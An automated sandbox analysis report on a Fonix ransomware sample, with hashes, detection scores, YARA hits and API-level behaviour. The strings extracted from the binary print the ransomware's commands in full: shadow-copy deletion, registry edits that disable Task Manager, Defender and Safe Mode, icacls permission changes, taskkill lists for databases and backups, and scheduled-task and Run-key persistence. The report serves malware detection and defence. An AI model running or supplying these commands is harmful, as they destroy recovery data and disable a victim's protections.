Analysis Report 8QxrJSmRtc

Overview

General Information

Sample Name: 8QxrJSmRtc (renamed file extension from none to exe)
Analysis ID: 338144
MD5: 6593b7ab157ac82967af0e92efa96134
SHA1: c50e003f5c9ebeebc798b6f00b09aae05518d6cf
SHA256: f8b132d8c750482bd5b6f03bae58f6805fb3480ef0904a21f0111ede5a1ebb1b

Most interesting Screenshot:

Detection

Fonix
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Fonix ransomware
Yara detected Ransomware_Generic
Deletes shadow drive data (may be related to ransomware)
May drop file containing decryption instructions (likely related to ransomware)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query locales information (e.g. system language)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains sections with non-standard names
Program does not show much activity (idle)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: 8QxrJSmRtc.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: 8QxrJSmRtc.exe Virustotal: Detection: 41% Perma Link
Source: 8QxrJSmRtc.exe ReversingLabs: Detection: 58%

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_01408900 CryptReleaseContext,_Init_thread_footer, 0_2_01408900
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_014081C0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__std_exception_copy, 0_2_014081C0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_014089F0 CryptGenRandom,CryptReleaseContext, 0_2_014089F0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_01408330 GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,CryptReleaseContext, 0_2_01408330
Source: 8QxrJSmRtc.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\~Ransomware\Fonix - 4.3.2\x64\Release\Fonix.pdb source: 8QxrJSmRtc.exe
Source: 8QxrJSmRtc.exe String found in binary or memory: https://code.jquery.com/jquery-latest.js
Source: 8QxrJSmRtc.exe String found in binary or memory: https://uupload.ir/files/g510_windows_10.gif
Source: 8QxrJSmRtc.exe String found in binary or memory: https://www.who.int

Spam, unwanted Advertisements and Ransom Demands:

barindex
Yara detected Fonix ransomware
Source: Yara match File source: 8QxrJSmRtc.exe, type: SAMPLE
Source: Yara match File source: 00000000.00000000.646603344.000000000147D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 8QxrJSmRtc.exe PID: 6768, type: MEMORY
Source: Yara match File source: 0.2.8QxrJSmRtc.exe.13b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.8QxrJSmRtc.exe.13b0000.0.unpack, type: UNPACKEDPE
Yara detected Ransomware_Generic
Source: Yara match File source: 8QxrJSmRtc.exe, type: SAMPLE
Source: Yara match File source: 00000000.00000000.646603344.000000000147D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 8QxrJSmRtc.exe PID: 6768, type: MEMORY
Source: Yara match File source: 0.2.8QxrJSmRtc.exe.13b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.8QxrJSmRtc.exe.13b0000.0.unpack, type: UNPACKEDPE
Deletes shadow drive data (may be related to ransomware)
Source: 8QxrJSmRtc.exe, 00000000.00000000.646603344.000000000147D000.00000002.00020000.sdmp Binary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet
Source: 8QxrJSmRtc.exe Binary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet
May drop file containing decryption instructions (likely related to ransomware)
Source: 8QxrJSmRtc.exe, 00000000.00000000.646603344.000000000147D000.00000002.00020000.sdmp Binary or memory string: How To Decrypt Files.hta\Help.txt
Source: 8QxrJSmRtc.exe Binary or memory string: How To Decrypt Files.hta\Help.txt

System Summary:

barindex
Detected potential crypto function
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_0145F914 0_2_0145F914
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_01458928 0_2_01458928
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_0145F07C 0_2_0145F07C
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013BE0E0 0_2_013BE0E0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013E30E0 0_2_013E30E0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_0146A32C 0_2_0146A32C
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_01456330 0_2_01456330
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_014453D4 0_2_014453D4
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_01451BDC 0_2_01451BDC
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013E1A70 0_2_013E1A70
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_0144F2C4 0_2_0144F2C4
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013BCAD0 0_2_013BCAD0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_0144F548 0_2_0144F548
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013B6D20 0_2_013B6D20
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013E4D00 0_2_013E4D00
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013C5D40 0_2_013C5D40
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013E4580 0_2_013E4580
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_014094C0 0_2_014094C0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_0145DCC4 0_2_0145DCC4
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013B84A0 0_2_013B84A0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013B13F0 0_2_013B13F0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013B5CD0 0_2_013B5CD0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013E2700 0_2_013E2700
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013C0F80 0_2_013C0F80
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_0144F7B0 0_2_0144F7B0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_014597B8 0_2_014597B8
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_014556B4 0_2_014556B4
Source: classification engine Classification label: mal84.rans.evad.winEXE@1/0@0/0
Source: 8QxrJSmRtc.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 8QxrJSmRtc.exe Virustotal: Detection: 41%
Source: 8QxrJSmRtc.exe ReversingLabs: Detection: 58%
Source: 8QxrJSmRtc.exe Static file information: File size 1266176 > 1048576
Source: 8QxrJSmRtc.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\~Ransomware\Fonix - 4.3.2\x64\Release\Fonix.pdb source: 8QxrJSmRtc.exe

Data Obfuscation:

barindex
PE file contains sections with non-standard names
Source: 8QxrJSmRtc.exe Static PE information: section name: _RDATA

Hooking and other Techniques for Hiding and Protection:

barindex
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_01421020 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_01421020

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 8QxrJSmRtc.exe Binary or memory string: OUTPUT ERROR ::::].FONIXZIP FILECOPY TO PATH \CPUB.KEYREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V DISABLETASKMGR /T REG_DWORD /D 1 /FREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER" /V DISABLEANTISPYWARE /T REG_DWORD /D 1 /FREG DELETE HKEY_CURRENT_USER\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /FREG DELETE HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /FSTART CMD.EXE /C ICACLS * /GRANT EVERYONE:(OI)(CI)F /T /C /QSTART CMD.EXE /C TASKKILL /T /F /IM SQL* && TASKKILL /F /T /IM VEEAM* && TASKKILL /F /T /IM MSEXCHANGE* && TASKKILL /F /T /IM MICROSOFT.EXCHANGE* && TASKKILL /F /T /IM PVX* && TASKKILL /F /T /IM DBSRV* && EXITSTART UP ATTRIB +H +S "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"SCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /RU SYSTEM /RL HIGHEST /FCOPY C:\PROGRAMDATA\XINOF.EXE "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"COPY C:\PROGRAMDATA\XINOF.EXE "C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXEXINOF.EXESCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FFLAG C:\PROGRAMDATA\NONSNONSFLAGBLACK LIST MMS.EXESCHEDUL2.EXESCHEDHELP.EXETIB_MOUNTER_MONITOR.EXESQLIOSIM.EXESQLAGENT.EXESQLMAINT.EXESQLSTUBSS.EXECSRSS.EXESQLCEIP.EXEMSTSC.EXETASKMGR.EXESQLSERVR.EXEQBIDPSERVICE.EXESQLSERVER.EXEMSFTESQL.EXESQLAGENT.EXESQLBROWSER.EXESQLWRITER.EXEORACLE.EXEOCSSD.EXEDBSNMP.EXESYNCTIME.EXEMYDESKTOPQOS.EXEAGNTSVC.EXEISQLPPLUSSVC.EXEISQLPUSSVC.EXEXFSSVCCON.EXEMYDESKTOPSERVICE.EXEOCAUTOUPDS.EXEENCSVC.EXEFIREFOXCONFIG.EXETBIRDCONFIG.EXEOCOMM.EXEMYSQLD.EXEMYSQLD-NT.EXEMYSQLD-OPT.EXEDBENG50.EXESQBCORESERVICE.EXEEXCEL.EXEINFOPATH.EXEMSACCESS.EXEMSPUB.EXEONENOTE.EXEOUTLOOK.EXEPOWERPNT.EXESTREAM.EXETHEBAT.EXETHEBAT64.EXETHUNDERBIRD.EXEVISIO.EXEWINWORD.EXEWORDPAD.EXENOTEPAD.EXEPAINT.EXENOTEPAD++.EXEENDNOTE.EXEVMWAREUSER.EXEVMWARESERVICE.EXEVBOXSERVICE.EXEVBOXTRAY.EXESANDBOXIEDCOMLAUNCH.EXEPROCMON.EXEREGMON.EXEFILEMON.EXEWIRESHARK.EXENETMON.EXEVMTOOLSD.EXENTOSKRNL.EXESSMS.EXECBSERVICE.EXEHTTPD.EXEJUSCHED.EXEJUCHECK.EXEJAVAW.EXEJAVA.EXEIPTRAY.EXEIPERIUS.EXEFILEZILLA.EXEDATACOLLECTORSVC.EXEEDGETRANSPORT.EXESTORE.EXEACROTRAY.EXEAGENT.EXESAGECSCLIENT.EXEWSUSSERVICE.EXESLACK.EXENODE.EXEW3WP.EXEMYSQL.EXEMSMDSRV.EXEMSDTSSRVR.EXEFDLAUNCHER.EXEFDHOST.EXEREPORTINGS
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: 8QxrJSmRtc.exe Binary or memory string: Output error ::::].FONIXzip filecopy to path \Cpub.keyreg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /freg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /freg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /Freg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /Fstart cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Qstart cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exitstart up attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /RU SYSTEM /RL HIGHEST /Fcopy C:\ProgramData\XINOF.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"copy C:\ProgramData\XINOF.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exeXINOF.exeschtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /Freg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /fflag C:\ProgramData\nonsnonsFlagblack list mms.exeschedul2.exeschedhelp.exetib_mounter_monitor.exeSQLIOSIM.EXESqlagent.exesqlmaint.exesqlstubss.execsrss.exesqlceip.exemstsc.exetaskmgr.exesqlservr.exeQBIDPService.exesqlserver.exemsftesql.exesqlagent.exesqlbrowser.exesqlwriter.exeoracle.exeocssd.exedbsnmp.exesynctime.exemydesktopqos.exeagntsvc.exeisqlpplussvc.exeisqlpussvc.exexfssvccon.exemydesktopservice.exeocautoupds.exeencsvc.exefirefoxconfig.exetbirdconfig.exeocomm.exemysqld.exemysqld-nt.exemysqld-opt.exedbeng50.exesqbcoreservice.exeexcel.exeinfopath.exemsaccess.exemspub.exeonenote.exeoutlook.exepowerpnt.exestream.exethebat.exethebat64.exeThunderbird.exevisio.exewinword.exewordpad.exenotepad.exepaint.exenotepad++.exeendnote.exevmwareuser.exevmwareservice.exevboxservice.exevboxtray.exeSandboxiedcomlaunch.exeprocmon.exeregmon.exefilemon.exewireshark.exenetmon.exevmtoolsd.exentoskrnl.exeSsms.execbService.exehttpd.exejusched.exejucheck.exejavaw.exejava.exeiptray.exeIperius.exeFileZilla.exeDataCollectorSvc.exeEdgeTransport.exestore.exeacrotray.exeagent.exeSageCSClient.exewsusservice.exeslack.exenode.exew3wp.exemysql.exemsmdsrv.exeMsDtsSrvr.exefdlauncher.exefdhost.exeReportingS

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_01421FE8 GetLastError,IsDebuggerPresent,OutputDebugStringW, 0_2_01421FE8
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_01421FE8 GetLastError,IsDebuggerPresent,OutputDebugStringW, 0_2_01421FE8
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_01422D3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_01422D3C
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_014517F8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_014517F8

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: EnumSystemLocalesW, 0_2_014691B4
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: EnumSystemLocalesW, 0_2_014690E4
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_014695F0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 0_2_01468D98
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: try_get_function,GetLocaleInfoW, 0_2_0145D4B0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_014697CC
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: EnumSystemLocalesW, 0_2_0145CEE0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_01423200 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_01423200
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 338144 Sample: 8QxrJSmRtc Startdate: 11/01/2021 Architecture: WINDOWS Score: 84 7 Antivirus / Scanner detection for submitted sample 2->7 9 Multi AV Scanner detection for submitted file 2->9 11 Yara detected Fonix ransomware 2->11 13 4 other signatures 2->13 5 8QxrJSmRtc.exe 2->5         started        process3
No contacted IP infos